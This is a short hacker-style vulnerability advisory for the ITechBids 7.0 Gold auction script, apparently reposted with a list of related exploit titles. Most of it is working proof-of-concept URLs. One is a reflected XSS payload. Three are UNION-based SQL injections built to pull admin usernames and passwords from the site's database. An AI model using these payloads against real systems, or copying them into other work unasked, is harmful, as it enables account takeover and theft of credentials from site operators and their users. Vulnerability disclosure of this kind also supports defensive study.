######## ## ## ###### ######## ## ## ######## ######## ####### ########

## ### ## ## ## ## ## ## ## ## ## ## ## ## ## ##

## #### ## ## ## ## #### ## ## ## ## ## ##

###### ## ## ## ## ######## ## ######## ## ####### ## ##

## ## #### ## ## ## ## ## ## ## ## ##

## ## ### ## ## ## ## ## ## ## ## ## ## ##

######## ## ## ###### ## ## ## ## ## ####### ########

################################ !R4Q!4N H4CK3R ###################################

ITechBids 7.0 Gold Multiple Remote Vulnerabilities

Website : http://www.itechscripts.com

Founded By : Encrypt3d.M!nd

NOTE:I Didn't Search The Script Well,So Maybe There is other Vulnerabilities.

# 1- Cross-site scripting (XSS):

Affected File : forward_to_friend.php

PoC :

/forward_to_friend.php?productid=<script>alert(666);</script>

# 2-Remote Sql Injection(s) :

Affected File(s) :

sellers_othersitem.php

classifieds.php

shop.php

Note:There is Other Files Affected But I Couldn't Exploit Them :(

PoC:

/sellers_othersitem.php?seller_id=666666 union select 1,2,3,concat(user_name,0x3a,password),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39 from admin

/classifieds.php?productid=666666 union select 1,2,3,concat(user_name,0x3a,password),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39 from admin

/shop.php?id=666666 union select 1,2,3,concat(user_name,0x3a,password),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39 from admin

# Greetz:

MY Sweet,L!0N,EL Mariachi,-=MizO=-(:-L),Shadow Administrator,

KoRn The Dog,Mini-Spider,All My Friends

The EnD :D

【ITechBids 7.0 Gold (XSS/SQL) Multiple Remote Vulnerabilities】相关文章：

★ PHPizabi 0.848b C1 HFP1 Remote Code Execution Exploit

★ jSite 1.0 OE (SQL/LFI) Multiple Remote Vulnerabilities

★ Avlc Forum (vlc_forum.php id) Remote SQL Injection Vulnerability

★ LoveCMS 1.6.2 Final Update Settings Remote Exploit

★ Microsoft Visual Studio (Msmask32.ocx) ActiveX Remote BOF Exploit

★ MFORUM 0.1a Arbitrary Add-Admin Vulnerability

★ WarFTP 1.65 (USER) Remote Buffer Overlow Exploit

★ Million Pixels 3 (id_cat) Remote SQL Injection Vulnerability

★ HockeySTATS Online 2.0 Multiple Remote SQL Injection Vulnerabilities

★ pSys 0.7.0 Alpha Multiple Remote File Inclusion Vulnerability